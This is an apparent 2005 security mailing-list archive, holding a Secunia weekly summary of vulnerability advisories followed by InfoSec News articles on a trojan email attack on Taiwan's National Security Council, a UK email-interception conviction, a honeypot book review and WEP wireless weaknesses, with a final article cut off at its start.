[SA16783] GNU Mailutils imap4d "SEARCH" Format String Vulnerability Critical: Moderately critical Where: From remote Impact: System access Released: 2005-09-12 A vulnerability has been reported in GNU Mailutils, which can be exploited by malicious users to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/16783/ -- [SA16781] pam-per-user Cached PAM "subrequest" Vulnerability Critical: Moderately critical Where: From remote Impact: Security Bypass Released: 2005-09-13 A vulnerability has been reported in pam-per-user, which can be exploited by malicious users to bypass certain security restrictions. Full Advisory: http://secunia.com/advisories/16781/ -- [SA16771] Debian update for libapache-mod-ssl Critical: Moderately critical Where: From remote Impact: Security Bypass Released: 2005-09-13 Debian has issued an update for libapache-mod-ssl. This fixes a security issue, which potentially can be exploited by malicious people to bypass certain security restrictions. Full Advisory: http://secunia.com/advisories/16771/ -- [SA16769] SUSE update for apache2 Critical: Moderately critical Where: From remote Impact: Security Bypass, Privilege escalation, DoS Released: 2005-09-12 SUSE has issued an update for apache2. This fixes some vulnerabilities, which can be exploited by malicious, local users to gain escalated privileges and by malicious people to bypass certain security restrictions and cause a DoS (Denial of Service). Full Advisory: http://secunia.com/advisories/16769/ -- [SA16768] Debian update for squid Critical: Moderately critical Where: From remote Impact: DoS Released: 2005-09-13 Debian has issued an update for squid. This fixes some vulnerabilities, which potentially can be exploited by malicious people to cause a DoS (Denial of Service). Full Advisory: http://secunia.com/advisories/16768/ -- [SA16763] UnixWare update for racoon Critical: Moderately critical Where: From remote Impact: DoS Released: 2005-09-09 SCO has issued an update for racoon. This fixes a vulnerability, which can be exploited by malicious people to cause a DoS (Denial of Service). Full Advisory: http://secunia.com/advisories/16763/ -- [SA16760] Mandriva update for squid Critical: Moderately critical Where: From remote Impact: DoS Released: 2005-09-13 Mandriva has issued an update for squid. This fixes some vulnerabilities, which potentially can be exploited by malicious people to cause a DoS (Denial of Service). Full Advisory: http://secunia.com/advisories/16760/ -- [SA16758] Red Hat update for pcre Critical: Moderately critical Where: From remote Impact: System access Released: 2005-09-09 Red Hat has issued an update for pcre. This fixes a vulnerability, which potentially can be exploited by malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/16758/ -- [SA16754] Debian update for apache2 Critical: Moderately critical Where: From remote Impact: Security Bypass, Cross Site Scripting, Manipulation of data, DoS Released: 2005-09-09 Debian has issued an update for apache2. This fixes three vulnerabilities and a security issue, which can be exploited by malicious people to cause a DoS (Denial of Service), conduct HTTP request smuggling attacks, and potentially bypass certain security restrictions. Full Advisory: http://secunia.com/advisories/16754/ -- [SA16753] Mandriva update for apache2 Critical: Moderately critical Where: From remote Impact: Security Bypass, DoS Released: 2005-09-09 Mandriva has issued an update for apache2. This fixes a vulnerability and a security issue, which can be exploited by malicious people to cause a DoS (Denial of Service) and potentially bypass certain security restrictions. Full Advisory: http://secunia.com/advisories/16753/ -- [SA16752] Textbased MSN Client (TMSNC) Format String Vulnerability Critical: Moderately critical Where: From remote Impact: Unknown Released: 2005-09-12 A vulnerability has been reported in TMSNC, with an unknown impact. Full Advisory: http://secunia.com/advisories/16752/ -- [SA16751] OS/400 osp-cert Certificate Handling Vulnerabilities Critical: Moderately critical Where: From remote Impact: Unknown Released: 2005-09-09 Some vulnerabilities have been reported in OS/400, with unknown impacts. Full Advisory: http://secunia.com/advisories/16751/ -- [SA16748] Slackware update for mod_ssl Critical: Moderately critical Where: From remote Impact: Security Bypass Released: 2005-09-09 Slackware has issued an update for mod_ssl. This fixes a vulnerability which potentially can be exploited by malicious people to bypass certain security restrictions. Full Advisory: http://secunia.com/advisories/16748/ -- [SA16746] Fedora update for httpd Critical: Moderately critical Where: From remote Impact: Security Bypass, DoS Released: 2005-09-08 Fedora has issued an update for httpd. This fixes a vulnerability and a security issue, which can be exploited by malicious people to cause a DoS (Denial of Service) and potentially bypass certain security restrictions. Full Advisory: http://secunia.com/advisories/16746/ -- [SA16787] Debian update for tdiary Critical: Less critical Where: From remote Impact: Hijacking Released: 2005-09-13 Debian has issued an update for tdiary. This fixes a vulnerability, which can be exploited by malicious people to conduct cross-site request forgery attacks. Full Advisory: http://secunia.com/advisories/16787/ -- [SA16794] Slackware update for dhcpcd Critical: Less critical Where: From local network Impact: DoS Released: 2005-09-13 Slackware has issued an update for dhcpcd. This fixes a vulnerability, which can be exploited by malicious people to cause a DoS (Denial of Service). Full Advisory: http://secunia.com/advisories/16794/ -- [SA16774] rdiff-backup "--restrict" Security Bypass Vulnerability Critical: Less critical Where: From local network Impact: Security Bypass Released: 2005-09-12 A vulnerability has been reported in rdiff-backup, which can be exploited by malicious users to bypass certain security restrictions. Full Advisory: http://secunia.com/advisories/16774/ -- [SA16747] Linux Kernel Multiple Vulnerabilities Critical: Less critical Where: From local network Impact: Exposure of sensitive information, Privilege escalation, DoS Released: 2005-09-09 Some vulnerabilities have been reported in the Linux kernel, which potentially can be exploited by malicious, local users to disclose certain sensitive information, cause a DoS (Denial of Service) and gain escalated privileges, or by malicious people to cause a DoS. Full Advisory: http://secunia.com/advisories/16747/ -- [SA16823] Debian update for common-lisp-controller Critical: Less critical Where: Local system Impact: Privilege escalation Released: 2005-09-14 Debian has issued an update for common-lisp-controller. This fixes a vulnerability, which can be exploited by malicious, local users to gain escalated privileges. Full Advisory: http://secunia.com/advisories/16823/ -- [SA16822] common-lisp-controller Cache Directory Privilege Escalation Critical: Less critical Where: Local system Impact: Privilege escalation Released: 2005-09-14 Francois-Rene Rideau has reported a vulnerability in common-lisp-controller, which can be exploited by malicious, local users to gain escalated privileges. Full Advisory: http://secunia.com/advisories/16822/ -- [SA16821] Mandriva update for XFree86 Critical: Less critical Where: Local system Impact: Privilege escalation Released: 2005-09-14 Mandriva has issued an update for XFree86. This fixes a vulnerability, which potentially can be exploited by malicious, local users to gain escalated privileges. Full Advisory: http://secunia.com/advisories/16821/ -- [SA16817] LineControl Java Client Log Messages Password Disclosure Critical: Less critical Where: Local system Impact: Exposure of sensitive information Released: 2005-09-14 A vulnerability has been reported in LineControl Java Client, which can be exploited by malicious, local users to disclose certain sensitive information. Full Advisory: http://secunia.com/advisories/16817/ -- [SA16816] GNU Texinfo Insecure Temporary File Creation Critical: Less critical Where: Local system Impact: Privilege escalation Released: 2005-09-15 Frank Lichtenheld has reported a vulnerability in texindex, which can be exploited by malicious, local users to perform certain actions on a vulnerable system with escalated privileges. Full Advisory: http://secunia.com/advisories/16816/ -- [SA16812] Red Hat update for xorg-x11 Critical: Less critical Where: Local system Impact: Privilege escalation Released: 2005-09-14 Red Hat has issued an update for xorg-x11. This fixes a vulnerability, which potentially can be exploited by malicious, local users to gain escalated privileges. Full Advisory: http://secunia.com/advisories/16812/ -- [SA16803] Ubuntu update for xserver-xfree86/xserver-xorg Critical: Less critical Where: Local system Impact: Privilege escalation Released: 2005-09-13 Ubuntu has issued updates for xserver-xfree86 and xserver-xorg. These fix a vulnerability, which potentially can be exploited by malicious, local users to gain escalated privileges. Full Advisory: http://secunia.com/advisories/16803/ -- [SA16799] Red Hat update for XFree86 Critical: Less critical Where: Local system Impact: Privilege escalation Released: 2005-09-13 Red Hat has issued an update for XFree86. This fixes a vulnerability, which potentially can be exploited by malicious, local users to gain escalated privileges. Full Advisory: http://secunia.com/advisories/16799/ -- [SA16791] Gentoo update for xorg-x11 Critical: Less critical Where: Local system Impact: Privilege escalation Released: 2005-09-13 Gentoo has issued an update for xorg-x11. This fixes a vulnerability, which potentially can be exploited by malicious, local users to gain escalated privileges. Full Advisory: http://secunia.com/advisories/16791/ -- [SA16790] X11 Pixmap Creation Integer Overflow Vulnerability Critical: Less critical Where: Local system Impact: Privilege escalation Released: 2005-09-13 A vulnerability has been reported in X11, which potentially can be exploited by malicious, local users to gain escalated privileges. Full Advisory: http://secunia.com/advisories/16790/ -- [SA16777] XFree86 Pixmap Creation Integer Overflow Vulnerability Critical: Less critical Where: Local system Impact: Privilege escalation Released: 2005-09-13 Luke Hutchison has reported a vulnerability in XFree86, which potentially can be exploited by malicious, local users to gain escalated privileges. Full Advisory: http://secunia.com/advisories/16777/ -- [SA16755] Red Hat update for exim Critical: Less critical Where: Local system Impact: Privilege escalation Released: 2005-09-09 Red Hat has issued an update for exim. This fixes a vulnerability, which potentially can be exploited by malicious, local users to gain escalated privileges. Full Advisory: http://secunia.com/advisories/16755/ -- [SA16750] Ubuntu update for kernel Critical: Less critical Where: Local system Impact: Security Bypass, Exposure of sensitive information, Privilege escalation, DoS Released: 2005-09-09 Ubuntu has issued an update for kernel. This fixes some vulnerabilities, which can be exploited by malicious, local users to disclose certain sensitive information, cause a DoS (Denial of Service), bypass certain security restrictions and gain escalated privileges. Full Advisory: http://secunia.com/advisories/16750/ -- [SA16749] Slackware update for kdebase Critical: Less critical Where: Local system Impact: Privilege escalation Released: 2005-09-09 Slackware has issued an update for kdebase. This fixes a vulnerability, which potentially can be exploited by malicious, local users to gain escalated privileges. Full Advisory: http://secunia.com/advisories/16749/ -- [SA16745] Debian update for kdelibs Critical: Less critical Where: Local system Impact: Exposure of sensitive information Released: 2005-09-08 Debian has issued an update for kdelibs. This fixes a security issue, which can be exploited by malicious, local users to gain knowledge of certain information. Full Advisory: http://secunia.com/advisories/16745/ -- [SA16825] Fedora update for util-linux Critical: Not critical Where: Local system Impact: Privilege escalation Released: 2005-09-15 Fedora has issued an update for util-linux. This fixes a vulnerability, which potentially can be exploited by malicious, local users to gain escalated privileges. Full Advisory: http://secunia.com/advisories/16825/ -- [SA16795] Slackware update for util-linux Critical: Not critical Where: Local system Impact: Privilege escalation Released: 2005-09-13 Slackware has issued an update for util-linux. This fixes a security issue, which potentially can be exploited by malicious, local users to gain escalated privileges. Full Advisory: http://secunia.com/advisories/16795/ -- [SA16785] util-linux umount "-r" Re-Mounting Security Issue Critical: Not critical Where: Local system Impact: Privilege escalation Released: 2005-09-13 David Watson has reported a security issue in util-linux, which potentially can be exploited by malicious, local users to gain escalated privileges. Full Advisory: http://secunia.com/advisories/16785/ -- [SA16765] Debian update for gcvs Critical: Not critical Where: Local system Impact: Privilege escalation Released: 2005-09-09 Debian has issued an update for gcvs. This fixes a security issue, which potentially can be exploited by malicious, local users to perform certain actions on a vulnerable system with escalated privileges. Full Advisory: http://secunia.com/advisories/16765/ Other:-- [SA16761] Cisco CSS SSL Authentication Bypass Vulnerability Critical: Moderately critical Where: From remote Impact: Security Bypass Released: 2005-09-09 A vulnerability has been reported in Cisco CSS (Content Services Switch), which can be exploited by malicious users to bypass certain security restrictions. Full Advisory: http://secunia.com/advisories/16761/ -- [SA16806] Linksys WRT54G Multiple Vulnerabilities Critical: Moderately critical Where: From local network Impact: Security Bypass, DoS, System access Released: 2005-09-14 Greg MacManus has reported some vulnerabilities in WRT54G, which can be exploited malicious people to bypass certain security restrictions, cause a DoS (Denial of Service), or compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/16806/ -- [SA16776] Ingate Firewall and SIParator Unspecified Cross-Site Scripting Critical: Less critical Where: From remote Impact: Cross Site Scripting Released: 2005-09-12 A vulnerability has been reported in Ingate Firewall and Ingate SIParator, which can be exploited by malicious people to conduct cross-site scripting attacks. Full Advisory: http://secunia.com/advisories/16776/ Cross Platform:-- [SA16820] TWiki "rev" Shell Command Injection Vulnerability Critical: Highly critical Where: From remote Impact: System access Released: 2005-09-15 A vulnerability has been reported in TWiki, which can be exploited by malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/16820/ -- [SA16767] Mozilla IDN URL Domain Name Buffer Overflow Critical: Highly critical Where: From remote Impact: DoS, System access Released: 2005-09-09 A vulnerability has been discovered in Mozilla Suite, which can be exploited by malicious people to cause a DoS (Denial of Service) or to compromise a user's system. Full Advisory: http://secunia.com/advisories/16767/ -- [SA16766] Netscape IDN URL Domain Name Buffer Overflow Critical: Highly critical Where: From remote Impact: DoS, System access Released: 2005-09-09 A vulnerability has been discovered in Netscape, which can be exploited by malicious people to cause a DoS (Denial of Service) or to compromise a user's system. Full Advisory: http://secunia.com/advisories/16766/ -- [SA16764] Firefox IDN URL Domain Name Buffer Overflow Critical: Highly critical Where: From remote Impact: DoS, System access Released: 2005-09-09 Tom Ferris has discovered a vulnerability in Firefox, which can be exploited by malicious people to cause a DoS (Denial of Service) or to compromise a user's system. Full Advisory: http://secunia.com/advisories/16764/ -- [SA16826] Noah's Classified SQL Injection and Cross-Site Scripting Critical: Moderately critical Where: From remote Impact: Cross Site Scripting, Manipulation of data Released: 2005-09-15 trueend5 has discovered two vulnerabilities in Noah's Classified, which can be exploited by malicious people to conduct cross-site scripting and SQL injection attacks. Full Advisory: http://secunia.com/advisories/16826/ -- [SA16819] DeluxeBB SQL Injection Vulnerabilities Critical: Moderately critical Where: From remote Impact: Manipulation of data Released: 2005-09-15 abducter has discovered some vulnerabilities in DeluxeBB, which can be exploited by malicious people to conduct SQL injection attacks. Full Advisory: http://secunia.com/advisories/16819/ -- [SA16813] ATutor Password Reminder SQL Injection Vulnerability Critical: Moderately critical Where: From remote Impact: Manipulation of data Released: 2005-09-15 rgod has discovered a vulnerability in ATutor, which can be exploited by malicious people to conduct SQL injection attacks. Full Advisory: http://secunia.com/advisories/16813/ -- [SA16802] Sun Java System Application Server JAR File Content Disclosure Critical: Moderately critical Where: From remote Impact: Exposure of sensitive information Released: 2005-09-14 A vulnerability has been reported in Sun Java System Application Server, which can be exploited by malicious people to disclose certain sensitive information. Full Advisory: http://secunia.com/advisories/16802/ -- [SA16801] PHP-Nuke SQL Injection Vulnerabilities Critical: Moderately critical Where: From remote Impact: Manipulation of data Released: 2005-09-13 Robin Verton has discovered some vulnerabilities in PHP-Nuke, which can be exploited by malicious people to conduct SQL injection attacks. Full Advisory: http://secunia.com/advisories/16801/ -- [SA16796] Subscribe Me Pro "l" Parameter Directory Traversal Vulnerability Critical: Moderately critical Where: From remote Impact: Exposure of sensitive information Released: 2005-09-14 ShoCK FX has reported a vulnerability in Subscribe Me Professional, which can be exploited by malicious people to gain knowledge of sensitive information. Full Advisory: http://secunia.com/advisories/16796/ -- [SA16793] Python PCRE Integer Overflow Vulnerability Critical: Moderately critical Where: From remote Impact: DoS, System access Released: 2005-09-13 A vulnerability has been reported in Python, which potentially can be exploited by malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/16793/ -- [SA16788] Zebedee Denial of Service Vulnerability Critical: Moderately critical Where: From remote Impact: DoS Released: 2005-09-12 A vulnerability has been reported in Zebedee, which can be exploited by malicious people to cause a DoS (Denial of Service). Full Advisory: http://secunia.com/advisories/16788/ -- [SA16786] Snort TCP SACK Option Handling Denial of Service Critical: Moderately critical Where: From remote Impact: DoS Released: 2005-09-13 Alejandro Hernandez Hernandez has reported a vulnerability in Snort, which can be exploited by malicious people to cause a DoS (Denial of Service). Full Advisory: http://secunia.com/advisories/16786/ -- [SA16775] PunBB Multiple Vulnerabilities Critical: Moderately critical Where: From remote Impact: Cross Site Scripting, Manipulation of data Released: 2005-09-12 Some vulnerabilities have been reported in PunBB, which can be exploited by malicious people to conduct SQL injection and script insertion attacks. Full Advisory: http://secunia.com/advisories/16775/ -- [SA16773] Qt Library zlib Vulnerabilities Critical: Moderately critical Where: From remote Impact: DoS, System access Released: 2005-09-12 Some vulnerabilities have been reported in Qt, which can be exploited by malicious people to cause a DoS (Denial of Service) or potentially compromise a user's system. Full Advisory: http://secunia.com/advisories/16773/ -- [SA16762] class-1 Forum Software File Extension SQL Injection Vulnerability Critical: Moderately critical Where: From remote Impact: Security Bypass, Manipulation of data Released: 2005-09-09 rgod has discovered a vulnerability in class-1 Forum Software, which can be exploited by malicious people to conduct SQL injection attacks. Full Advisory: http://secunia.com/advisories/16762/ -- [SA16757] Sun Java System Web Proxy Server Denial of Service Vulnerabilities Critical: Moderately critical Where: From remote Impact: DoS Released: 2005-09-09 Three vulnerabilities have been reported in Sun Java System Web Proxy Server, which can be exploited by malicious people to cause a DoS (Denial of Service). Full Advisory: http://secunia.com/advisories/16757/ -- [SA16756] mimicboard2 Script Insertion and Exposure of User Credentials Critical: Moderately critical Where: From remote Impact: Cross Site Scripting, Exposure of sensitive information Released: 2005-09-09 Donnie Werner has reported a vulnerability and a security issue in mimicboard2, which can be exploited by malicious people to conduct script insertion attacks and disclose sensitive information. Full Advisory: http://secunia.com/advisories/16756/ -- [SA16830] IBM Lotus Domino "BaseTarget" and "Src" Cross-Site Scripting Critical: Less critical Where: From remote Impact: Cross Site Scripting Released: 2005-09-15 Two vulnerabilities have been reported in Lotus Domino, which can be exploited by malicious people to conduct cross-site scripting attacks. Full Advisory: http://secunia.com/advisories/16830/ -- [SA16744] Sawmill Error Message Cross-Site Scripting Vulnerability Critical: Less critical Where: From remote Impact: Cross Site Scripting Released: 2005-09-09 NTA Monitor has reported a vulnerability in Sawmill, which can be exploited by malicious people to conduct cross-site scripting attacks. Full Advisory: http://secunia.com/advisories/16744/ ======================================================================== Secunia recommends that you verify all advisories you receive, by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Subscribe: http://secunia.com/secunia_weekly_summary/ Contact details: Web : http://secunia.com/ E-mail : support@secunia.com Tel : +45 70 20 51 44 Fax : +45 70 20 51 45 From isn at c4i.org Fri Sep 16 05:03:40 2005 From: isn at c4i.org (InfoSec News) Date: Fri Sep 16 05:09:47 2005 Subject: [ISN] NSC computers targeted in hacker e-mail attack Message-ID: http://www.taipeitimes.com/News/taiwan/archives/2005/09/15/2003271706 STAFF WRITER Sep 15, 2005 The National Security Council's (NSC) computer system was the target of an attempted e-mail attack Monday, according to a report in the Liberty Times, the Taipei Times' sister newspaper. According to sources, the attempted break-in was discovered yesterday afternoon, and a meeting was immediately called to discuss ways of beefing up network security. According to the Liberty Times' source, the NSC's computers began acting up yesterday afternoon. An investigation revealed that e-mails containing a "trojan" program had been sent to NSC Deputy Secretary General Ko Cheng-heng's (?_????) current and former secretaries. Had the e-mail been opened by either assistant, the program could have installed a "backdoor" into the computer, giving the sender full access to the computer system. Ko is responsible for national security and cooperation with the US. As the e-mails contained the subject line "freedom" and "arms procurement," it is suspected that the hacker had a clear idea of his targets. Sources within the NSC said that such subject lines were intended to dupe the recipients into opening the e-mails and activating the trojan program. Had the program been activated, the sender would have been able to see the contents of all the files on the NSC's computer system, including CDs and disks used on the system. Given the sensitivity of much of the materials, this e-mail attack, though unsuccessful, is being viewed with the utmost seriousness. The e-mail was discovered on the computer of Ko's former secretary, who had been transferred to another post in July. The current secretary had not yet checked e-mail, and as a result, the NSC's system was unaffected. Similar e-mails were also sent to senior officials in other government departments, although the full extent of the attack is not yet known. Officials said that an investigation was underway. Copyright ? 1999-2005 The Taipei Times From isn at c4i.org Fri Sep 16 05:03:56 2005 From: isn at c4i.org (InfoSec News) Date: Fri Sep 16 05:10:02 2005 Subject: [ISN] Tycoon fined for e-mail spying Message-ID: http://www.timesonline.co.uk/article/0,,2-1782674,00.html By Lewis Smith September 16, 2005 AN INTERNET pioneer who uncovered the e-mails that forced Dame Shirley Porter to pay ?12.3 million to end the homes-for-votes scandal was fined yesterday for hacking into the messages. Clifford Stanford, the founder of Demon Internet, was plotting a boardroom takeover of an electronic data firm and intercepted e-mails to and from Dame Shirley's son, John. The contents revealed that Dame Shirley had access to many millions of pounds despite her claim to have assets of only ?300,000 when faced with a ?42 million surcharge for vote-rigging. Details of the e-mails were passed to the media and Westminster City Council. Soon after ?25 million of assets were frozen, Dame Shirley offered to pay ?12.3 million to settle the case. Dame Shirley, as Tory leader of Westminster council during the 1980s, had overseen the selling of council homes in marginal wards to people thought likely to vote Conservative, while the homeless were placed in asbestos-ridden tower blocks in safe Labour wards. Allegations of gerrymandering ended with an auditor ordering her and fellow councillors to pay a ?31.6 million surcharge. That was upheld by the House of Lords, but Dame Shirley maintained that she was too poor to pay. With interest and legal fees increasing the surcharge to ?42 million, the dispute continued until her son's e-mails revealed that she was offering to bankroll him. Stanford, however, had not set out to find the truth about Dame Shirley's finances, but was spying on her son to oust him from the board of Redbus, the data company. When he saw Mr Porter's e-mails, he wrote to his accomplice: "Where do we go from here? Do we try to blackmail him into resigning from the board or do we go to the institutional shareholders or the press with it?" The two men had set up Redbus together, with Stanford investing much of the ?29 million he made from the sale of Demon. In June 2002, after falling out with Mr Porter, Stanford resigned from Redbus but kept his 30 per cent shareholding and began plotting a return to the board. Software was installed that ensured Mr Porter's e-mails were copied to an account set up by Stanford's accomplice, George Liddell, a private investigator. The electronic spying amounted to "unlawful and unauthorised interception of electronic communications" under the Regulation of Investigatory Powers Act (RIPA) 2000. Sarah Whitehouse, for the prosecution, said: "A vast amount of information was copied to that e-mail account, including information about John Porter and his family and his bank account details." Among the messages were "privileged legal documents", personal e-mails and business memos. Mr Porter and fellow board members realised what was happening only when details of a meeting was posted on a website within 15 minutes. Stanford and Liddell were cleared of conspiring to blackmail Dame Shirley and her son, but both admitted unauthorised interception of e-mails. Judge Geoffrey Rivlin, QC, who sentenced the men at Southwark Crown Court in London yesterday, said that the offence was an unjustified breach of confidentiality. He gave them both a six-month suspended prison sentence and ordered Stanford to pay a ?20,000 fine. The judge said: "It is essential people, in whatever walks of life, and, of course, those running important businesses, should know that the integrity of their confidential communication should be respected." David Martin-Sperry, counsel for Liddell, said his client's decision to take material to Westminster council's lawyers had benefited many people. Helen McDowell, Stanford's solicitor, said that he would appeal. -=- WHAT'S BANNED AND WHAT'S NOT Potentially lawful: looking over someone's shoulder to read e-mails Definitely unlawful: hacking into a computer to read their e-mails Potentially lawful: placing a bugging device near a telephone Definitely unlawful: using a bugging device in a telephone handset Potentially lawful: using a directional amplifier to listen to a mobile phone conversation Definitely unlawful: listening to the conversation by intercepting the signal Source: Justice From isn at c4i.org Fri Sep 16 05:04:54 2005 From: isn at c4i.org (InfoSec News) Date: Fri Sep 16 05:10:14 2005 Subject: [ISN] REVIEW: "Honeypots for Windows", Roger A. Grimes Message-ID: Forwarded from: "Rob, grandpa of Ryan, Trevor, Devon & Hannah" BKHNPTWN.RVW 20050614 "Honeypots for Windows", Roger A. Grimes, 2005, 1-59059-335-9, U$39.99 %A Roger A. Grimes roger@banneretcs.com %C 2560 Ninth Street, Suite 219, Berkeley, CA 94710 %D 2005 %G 1-59059-335-9 %I Apress %O U$39.99 510-549-5930 fax 510-549-5939 info@apress.com %O http://www.amazon.com/exec/obidos/ASIN/1590593359/robsladesinterne http://www.amazon.co.uk/exec/obidos/ASIN/1590593359/robsladesinte-21 %O http://www.amazon.ca/exec/obidos/ASIN/1590593359/robsladesin03-20 %O Audience i+ Tech 2 Writing 1 (see revfaq.htm for explanation) %P 392 p. %T "Honeypots for Windows" Now, we all know that honeypots can be fun: turning the tables on the blackhats, and watching what they are doing for once. We'll even acknowledge that the information honeypots provide can be useful, teaching us the types of approaches and activities that intruders are likely to undertake. But Grimes, in the introduction, stresses the position that honeypots are important security tools used for protection: that the extensive employment of honeypots will somehow "put an end" to script kiddies and the myriad attacks we see flying around the nets. Part one is about general honeypot concepts. Chapter one is an introduction to honeypots, looking at different honeypots and some common attack types, and has an extremely terse mention of the fact that there are risks associated with using honeypots. Components and simple topologies for honeypots are listed in chapter two. Part two moves specifically to Windows honeypots. Chapter two lists the ports that a Windows computer typically has open, and provides some (but not much) information on how the major ones work. A set of questions to ask yourself about how you want to operate and configure your honeypot are in chapter three, along with generic advice about hardening the computer if you use Windows as the native operating system. There is a table of services that you might want to turn off. There is also an inventory of programs you may wish to remove: it contains rather dated entries such as edlin.exe, but doesn't mention items such as tftp.exe. Chapters five to seven are concerned with the honeyd program and its Windows port, first in regard to description and installation, then configuration options, and finally service scripts. Other honeypot programs; Back Officer Friendly (BOF), LaBrea, SPECTER, KFSensor, Patriot Box, and Jackpot; are outlined in chapter eight, with the commercial entries getting the bulk of the space. Part three deals with the operation of honeypots. Chapter nine has some basic traffic analysis information, mostly documentation for the use of the Ethereal packet sniffer and the Snort intrusion detection system. A number of tools for monitoring your system are listed in chapter ten. Even though the title is "Honeypot Data Analysis," most of chapter eleven records more monitoring tools. Grimes reprises some of his stuff from "Malicious Mobile Code" (cf. BKMLMBCD.RVW), and adds a catalogue of assembly tools, to talk about analysing such code in chapter twelve. As a compilation of utilities, the book will probably be a handy reference for those who are interested in trying out a honeypot, or possibly just getting more information from their Windows computer. Network administrators who are seriously interested in actually running a honeypot or reviewing the data thus collected should probably look into "Know Your Enemy" (cf. BKKNYREN.RVW) or "Honeypots" (cf. BKHNYPOT.RVW), both by Spitzner. copyright Robert M. Slade, 2005 BKHNPTWN.RVW 20050614 ====================== (quote inserted randomly by Pegasus Mailer) rslade@vcn.bc.ca slade@victoria.tc.ca rslade@sun.soci.niu.edu A hundred years from now it won't matter the kind of house I lived in, what my bank account total was, or the kind of car I drove. But the world may be different because I was important in the life of a child. - Joyce Eyman http://victoria.tc.ca/techrev or http://sun.soci.niu.edu/~rslade From isn at c4i.org Mon Sep 19 02:08:58 2005 From: isn at c4i.org (InfoSec News) Date: Mon Sep 19 02:13:39 2005 Subject: [ISN] Technology Experts: Local wireless networks at risk Message-ID: http://www.freenewmexican.com/news/32642.html By Wendy Brown The New Mexican September 18, 2005 The Bull Ring restaurant in downtown Santa Fe has an outside patio that is perfect for having lunch -- and it might be an equally fine place for some leisurely hacking into wireless computer networks. Eric Padilla and Chris Ernst of AirNet Security of Santa Fe used a laptop computer Thursday to demonstrate how easy it would be to break into many wireless computer networks in downtown Santa Fe. Standing outside The Bull Ring, Padilla and Ernst did a quick search for networks and found six in the area. At least half of them were businesses, and without naming any names, some were definitely the type of enterprises that would have sensitive information about their clients. None of the networks was totally open, but all but one of them used WEP, or Wired Equivalency Privacy, as a security measure. Ernst and Padilla said using WEP is like having a paper door on your home -- someone could blast through it with little time and effort. Ernst and Padilla used a regular Microsoft program for a wireless laptop computer to determine the security on the networks. They didn't do any hacking. Ernst said free WEP-cracking programs are available on the Internet that also include step-by-step instructions on how to use them. Most people could get through WEP security in 10 to 20 minutes, he said. One network used TKIP, which stands for Temporal Key Integrity Protocol. TKIP is the next generation of WEP security, Padilla said, but tools are also available to break into that security measure as well. The only security measure that isn't breakable yet is Advanced Encryption Standard, or AES, Padilla said, but even systems using AES are vulnerable at the point where people log on to the system. "Nowadays, really no network is safe," Ernst said. Padilla and Ernst said one reason hacking has become so easy is because many hacking tools are free and available on the Internet. The Remote Exploit Web site is one that makes many of them available, Ernst said. For example, anyone can download the Auditor Security Collection from that site and put it on a compact disc, he said. The collection is a kind of "greatest hits" of wired- and wireless-hacking programs, Ernst said, and it also contains easy-to-use directions for the programs. Hackers usually use wireless-hacking programs to gain access to a network and then attack the wired portion, he said. The top of the Remote Exploit Web site says: "We are just a group of people that like to experiment with computers. We hope that we can provide some information back to the public and support the ongoing process of learning." Max Moser, who founded the Remote Exploit Web site in 2001, said in an e-mail that he doesn't support hackers at all, but thinks of the site as a place to keep security-minded people up to date on what hackers are capable of doing. He said he lives in Switzerland. Moser said he believes the security on wireless networks is always as good as its encryption, but many computer configurations are weak and contain security holes. Attacks "can overcome most protections with ease," he said. Padilla said the Remote Exploit site is good for security people like himself, but the downside is that it can help hackers find new ways to break into networks. And most hackers don't need any encouragement, Padilla and Ernst said. "Hackers have nothing better to do," Ernst said. "Instead of hanging out at the bar, they're hanging out at their buddy's house creating a new hacking tool at 3 o'clock in the morning." The hacking community constantly has the security community on the defense, Ernst said. Not everyone, however, agrees that wireless networks are that easy to penetrate. Al Catanach, owner of Computer Network Service Professionals, a company that provides wireless-Internet service in Santa Fe, said his system is secure because it uses AES and Data Encryption Standard and a radio system that is hardwired to a customer's computer. The radio authenticates to the CNSP network without requiring the user to provide a user name and password, so the wireless portion is seamless, Catanach said. Catanach said he was a computer-security manager for the Army National Guard for three years and is familiar with ways to keep networks secure. That said, even he admits that if a hacker really wants to get in, it's possible to find a way. "You're never going to have a fool-proof system," Catanach said. Thankfully, most hackers are kids who are more interested in seeing if they can crack a network than stealing anything or doing any damage, he said. Josh Dennis, who is in charge of security at Grappa Wireless of Santa Fe, said his network uses three layers of security -- DES, a user name and password that the radio authenticates automatically (without the customer having to type anything into the computer) and a color-code number. Dennis said the government has phased out DES for secret documents because extremely powerful computers can penetrate it, but the average hacker with a laptop would never be able to get through. And Gabriel Garcia, a member of Best Buy's "Geek Squad" of computer-security technicians, said he believes 64-bit WEP is secure. "It's extremely difficult to get into if it's set up correctly," he said. Another sign that wireless-security awareness is up is that the WorldWide WarDrive has come to an end, according to the organization's Web site. The drive started in 2002 and encouraged people all over the world to test the security measures of wireless systems, frequently showing that people weren't even using basic security measures like WEP. "By ending the project we aren't implying that WLANs (wireless local-area networks) are now secure," a person who signed in as "Roamer" said on the WarDrive site. "In fact they are far from it, but organized efforts to raise further awareness are no longer necessary. The message is getting out in a number of ways, and we have done our part." Even though security awareness is up, it also appears so is wireless hacking -- even if it's now more difficult. According to the Computer Security Institute/FBI 2005 Computer Security Survey, 55 percent of businesses surveyed reported that someone had used the company's computer network without authorization in the last year. Of those, about 18 percent reported abuse of a wireless network, up from zero percent in 2003 and every preceding year. Abuse of a wireless network cost 639 surveyed businesses more than $500,000, and the cost for all unauthorized access was more than $31 million, according to the survey. Ernst and Padilla said they recommend that people, and particularly businesses, get the strongest security measures available and then install a monitoring system so they know if someone hacks into the system and can figure out how to stop it from happening again. Systems for households start at $99 for a year's worth of monitoring, and business systems cost about $500 to start and $350 a month to run, Ernst said. "It's a small price to pay," he said. From isn at c4i.org Mon Sep 19 02:09:11 2005 From: isn at c4i.org (InfoSec News) Date: Mon Sep 19 02:13:55 2005 Subject: [ISN] New IE Bug Opens XP SP2 To Attack Message-ID: http://www.informationweek.com/story/showArticle.jhtml?articleID=170704182 By Gregg Keizer TechWeb News Sept. 16, 2005 Microsoft's Internet 